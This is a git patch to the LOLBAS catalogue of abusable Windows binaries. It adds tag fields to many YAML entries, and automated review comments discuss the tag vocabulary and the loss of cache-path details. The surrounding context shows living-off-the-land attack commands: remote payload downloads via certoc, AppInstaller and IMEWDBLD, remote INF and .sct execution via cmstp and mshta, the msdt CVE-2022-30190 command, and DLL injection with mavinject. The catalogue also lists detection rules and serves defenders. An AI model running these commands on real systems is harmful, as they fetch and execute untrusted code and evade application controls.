From ebbf08ec4d7121c0194e1b7cfbe1955ceee12c6d Mon Sep 17 00:00:00 2001 
From: Wietze
Date: Wed, 3 Apr 2024 16:53:36 +0100
Subject: [PATCH] Adding tags (closes #9, #318) (#362)
* Adding various tags as a first iteration
* Adding quotes
* Adding 'Custom Format' properly
* Updating to key:value pairs
* Update template
---
.github/workflows/gh-pages.yml | 1 +
YML-Schema.yml | 8 ++++++++
YML-Template.yml | 2 ++
yml/OSBinaries/AppInstaller.yml | 4 +++-
yml/OSBinaries/Certoc.yml | 4 ++--
yml/OSBinaries/Cmstp.yml | 4 ++++
yml/OSBinaries/ConfigSecurityPolicy.yml | 4 +++-
yml/OSBinaries/Control.yml | 4 ++--
yml/OSBinaries/Cscript.yml | 4 ++--
yml/OSBinaries/Diantz.yml | 4 ++++
yml/OSBinaries/Dnscmd.yml | 4 ++--
yml/OSBinaries/Eventvwr.yml | 4 ++++
yml/OSBinaries/Expand.yml | 2 --
yml/OSBinaries/Extexport.yml | 4 ++--
yml/OSBinaries/Extrac32.yml | 4 ++++
yml/OSBinaries/IMEWDBLD.yml | 4 +++-
yml/OSBinaries/Installutil.yml | 10 +++++++++-
yml/OSBinaries/Jsc.yml | 4 ++++
yml/OSBinaries/Makecab.yml | 8 ++++++--
yml/OSBinaries/Mavinject.yml | 6 ++++--
yml/OSBinaries/Msbuild.yml | 4 ++++
yml/OSBinaries/Msdt.yml | 6 ++++++
yml/OSBinaries/Mshta.yml | 8 +++++++-
yml/OSBinaries/Msiexec.yml | 6 ++++--
yml/OSBinaries/Netsh.yml | 4 ++--
yml/OSBinaries/Odbcconf.yml | 4 ++++
yml/OSBinaries/OfflineScannerShell.yml | 2 ++
yml/OSBinaries/Pcalua.yml | 4 ++--
yml/OSBinaries/Presentationhost.yml | 4 +++-
yml/OSBinaries/PrintBrm.yml | 4 ++++
yml/OSBinaries/Rasautou.yml | 4 ++--
yml/OSBinaries/Regasm.yml | 8 ++++++--
yml/OSBinaries/Register-cimprovider.yml | 2 ++
yml/OSBinaries/Regsvcs.yml | 8 ++++++--
yml/OSBinaries/Rundll32.yml | 12 +++++++++---
yml/OSBinaries/Tar.yml | 6 ++++++
yml/OSBinaries/Vbc.yml | 6 ++++--
yml/OSBinaries/Wmic.yml | 4 ++--
yml/OSBinaries/Wscript.yml | 4 ++--
yml/OSBinaries/Wuauclt.yml | 6 +++---
yml/OSBinaries/Xwizard.yml | 4 +++-
yml/OSLibraries/Advpack.yml | 4 ++++
yml/OSLibraries/Ieadvpack.yml | 2 ++
yml/OSLibraries/Scrobj.yml | 2 ++
yml/OSLibraries/Setupapi.yml | 4 ++++
yml/OSLibraries/Shell32.yml | 2 ++
yml/OSLibraries/Shimgvw.yml | 4 +++-
yml/OSLibraries/Syssetup.yml | 4 ++++ yml/OSLibraries/Zipfldr.yml | 2 -- yml/OSScripts/CL_LoadAssembly.yml | 2 ++ yml/OSScripts/UtilityFunctions.yml | 2 ++ yml/OtherMSBinaries/AccCheckConsole.yml | 4 ++++ yml/OtherMSBinaries/Appvlp.yml | 2 -- yml/OtherMSBinaries/Bginfo.yml | 14 ++++++++++++-- yml/OtherMSBinaries/Coregen.yml | 7 ++++--- yml/OtherMSBinaries/Excel.yml | 4 +++- yml/OtherMSBinaries/MsoHtmEd.yml | 4 +++- yml/OtherMSBinaries/Mspub.yml | 4 +++- yml/OtherMSBinaries/Powerpnt.yml | 4 +++- yml/OtherMSBinaries/Procdump.yml | 8 ++++++-- yml/OtherMSBinaries/Te.yml | 3 +++ yml/OtherMSBinaries/Tracker.yml | 4 ++++ yml/OtherMSBinaries/Winword.yml | 6 +++--- yml/OtherMSBinaries/vsls-agent.yml | 2 ++ yml/OtherMSBinaries/vstest.console.yml | 2 ++ 65 files changed, 229 insertions(+), 66 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 039ba1b..c8c08b1 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -20,6 +20,7 @@ jobs: mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts + rm -r yml/HonorableMentions - name: Deploy to LOLBAS-Project.github.io repo uses: peaceiris/actions-gh-pages@v3 diff --git a/YML-Schema.yml b/YML-Schema.yml index 250392f..58234b2 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -57,6 +57,14 @@ mapping: "OperatingSystem": type: str required: true + "Tags": + type: seq + sequence: + - type: map + mapping: + regex;(^[A-Z]): + type: str + required: false "Full_Path": type: seq required: true diff --git a/YML-Template.yml b/YML-Template.yml index bae43db..a26b89a 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -13,6 +13,8 @@ Commands: Privileges: Required privs MitreID: T1055 OperatingSystem: Windows 10 1803, Windows 10 1703 + Tags: + - Key1: Value1 # Optional field for one or more tags - Command: The second command Description: Description of the second command Usecase: A description of the usecase 
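Review bot: The new `rm -r yml/HonorableMentions` has no `-f`, so the deploy job aborts at this line as soon as a checkout lacks that directory, and `run:` steps on GitHub-hosted runners default to a fail-fast shell as far as I can tell. A tolerant `rm -rf yml/HonorableMentions` plus a one-line comment on why those entries are kept off the published site, e.g. `# HonorableMentions entries are not published`, stops an unrelated directory move from breaking the site build. The `run:` block this line belongs to starts before the hunk, so I can't see whether an explicit `shell:` or `set` line already changes that behaviour.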
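Review bot: The new `regex;(^[A-Z]):` mapping key under `"Tags"` only requires a tag key to begin with a capital letter, so a misspelt or inconsistent key (`Exectue`, `Inputs`) validates silently even though the tags are evidently meant as a fixed vocabulary that consumers filter on. The five keys this commit introduces (`Application`, `Download`, `Execute`, `Input`, `Type`) can be pinned with `regex;(^(Application|Download|Execute|Input|Type)$):`, widening the alternation when a new key is agreed; values stay `type: str`, so `Custom Format` versus `CustomFormat` is likewise unchecked and would need a per-key `enum:` if values are meant to be controlled too. The collapsed layout hides indentation, so I can't confirm `required: false` sits under `"Tags"` rather than under the regex key; in a pykwalify-style schema the two placements mean different things, so that is worth a look.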
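Review bot: The template line `- Key1: Value1 # Optional field for one or more tags` gives a contributor no hint of which keys and values are accepted, and the schema's regex only checks the first character, so the template is the only place the vocabulary can be learned. I would spell it out in that comment, e.g. `# Optional. Known keys/values: Execute (DLL, WSH), Input (INF, Custom Format), Download (INetCache), Type (Compression), Application (GUI)`, so new entries reuse an existing spelling instead of inventing one.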
diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml
index 3106002..c965bf8 100644
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@@ -5,12 +5,14 @@ Author: 'Wade Hickey'
 Created: 2020-12-02
 Commands:
 - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
- Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\
+ Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
 Usecase: Download file from Internet
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
 Detection:
diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml
index b505388..34b5c3f 100644
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows Server 2022
+ Tags:
+ - Execute: DLL
 - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
 Description: Downloads text formatted files
 Usecase: Download scripts, webshells etc.
@@ -21,8 +23,6 @@ Commands:
 Full_Path:
 - Path: c:\windows\system32\certoc.exe
 - Path: c:\windows\syswow64\certoc.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
 - IOC: Process creation with given parameter
diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml
index d46d598..903ec73 100644
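Review bot: Replacing the cache path with the bare word `INetCache` in the new `Description` drops the one detail an analyst needs to triage this technique: AppInstaller writes into the packaged-app container under `...\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\`, which is a different location from the `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE` path that the other download entries in this commit collapse to the same tag. `Download: INetCache` is a coarse category, not a forensic artifact, so the concrete path should survive somewhere — either kept in the Description, e.g. `...and is saved in the app's INetCache (C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\).`, or moved to an `- IOC:` entry under `Detection:`, whose list continues below this hunk.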
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.003
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Input: INF
 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
 Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
 Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.003
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ Tags:
+ - Input: INF
 Full_Path:
 - Path: C:\Windows\System32\cmstp.exe
 - Path: C:\Windows\SysWOW64\cmstp.exe
diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml
index 55e0059..c8aa121 100644
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@@ -12,12 +12,14 @@ Commands:
 MitreID: T1567
 OperatingSystem: Windows 10
 - Command: ConfigSecurityPolicy.exe https://example.com/payload
- Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+ Description: It will download a remote payload and place it in INetCache.
 Usecase: Downloads payload from remote server
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
 - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml
index acb3f9c..7f4e162 100644
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
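Review bot: Both Cmstp commands now carry only `Input: INF`, yet the second command's own `Description` says the INF's `UnRegisterOCXSection` executes a `.SCT` scriptlet through scrobj.dll — the end result is script-engine execution, which elsewhere in this commit is exactly what `Execute: WSH` marks (cscript, mshta). If the tag set is meant to describe what a command ultimately executes rather than only what it takes as input, the second command should also carry `- Execute: WSH` so a filter on script execution does not miss this entry. The first Cmstp command's `Command` and `Description` lines are above the hunk, so I can't tell whether the same applies to it.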
@@ -11,11 +11,11 @@ Commands:
 Privileges: User
 MitreID: T1218.002
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\System32\control.exe
 - Path: C:\Windows\SysWOW64\control.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml
diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml
index b73f756..129672d 100644
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@@ -11,11 +11,11 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: WSH
 Full_Path:
 - Path: C:\Windows\System32\cscript.exe
 - Path: C:\Windows\SysWOW64\cscript.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml
index a701ecc..74ff612 100644
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. + Tags: + - Type: Compression - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab Description: Download and compress a remote file and store it in a cab file on local machine. Usecase: Download and compress into a cab file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 + Tags: + - Type: Compression Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index ce91519..27f0d01 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -11,11 +11,11 @@ Commands: Privileges: DNS admin MitreID: T1543.003 OperatingSystem: Windows server + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml - IOC: Dnscmd.exe loading dll from UNC/arbitrary path diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 286d68f..e0a46a3 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Application: GUI - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1548.002 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Application: GUI Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 1503986..0bd732d 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 2d18eeb..c75e30a 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml 
@@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index bfcce17..ae46dbc 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 3c71cfc..7803476 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml 
@@ -5,12 +5,14 @@ Author: 'Wade Hickey' Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw - Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4351a0e..40d9a44 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting 
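Review bot: The rewritten `Description` now ends in `save it to INetCache.`, losing the observation that IMEWDBLD drops the payload into a randomly named 8-character subfolder as `[1]`, under either `INetCache\` or `INetCache\IE\`; that pattern is what lets a hunt rule or a forensic timeline tell an IMEWDBLD download apart from ordinary browser-cache churn. The `Download: INetCache` tag records only the category, so I would keep the removed path pattern, e.g. `...save it to INetCache (%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1] or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]).`, or move it into an `- IOC:` line under `Detection:`, which continues below this hunk.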
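Review bot: `Input: Custom Format` is the opaque value in this hunk: the Installutil commands consume a .NET assembly (`AllTheThings.dll` on the visible `/U` command line), and the same value is attached to regasm and regsvcs in this commit, so it appears to mean "a .NET assembly carrying a specific entry class" — but nothing in the entry says so, and a reader filtering the corpus cannot know whether `Custom Format` means the same thing for Installutil as for regasm. Either choose a self-describing value, e.g. `- Input: .NET Assembly`, or document in the template or schema what `Custom Format` denotes. The first command's `Command` line sits above the hunk, so I'm going by the second command and the shared tag.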
@@ -18,13 +21,18 @@ Commands: Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 2b56882..b4e7198 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index de392e9..c65d52e 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml 
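Review bot: Tagging both jsc.exe commands `Execute: WSH` misdescribes them: the hunk's own `Description` says jsc compiles JavaScript in `Library.js` into `Library.dll`, i.e. it is the JScript.NET compiler emitting a .NET assembly, not a Windows Script Host interpreter like cscript/wscript, and the entries keep MITRE T1127 (trusted developer utilities) rather than the T1218 used for the script hosts. A filter on `Execute: WSH` meant to catch script-host abuse would pull in a compiler, while a filter for compiler abuse would miss it. If the vocabulary is about the script language rather than the host, the key name should say so; otherwise a value such as `- Type: Compiler` matches the Description, or leave the entry untagged until a compiler value is agreed.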
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file @@ -25,11 +29,11 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 61d5411..33e2aa7 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -18,11 +20,11 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml - IOC: mavinject.exe should not run unless APP-v is in use on the workstation diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 7aa009d..62d95ff 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters @@ -32,6 +34,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections 
diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 2704db8..ed0a601 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Application: GUI - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Application: GUI - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Application: GUI Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index dfb40b3..8a3de9f 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -32,13 +34,17 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) + Tags: + - Execute: WSH - Command: mshta.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: 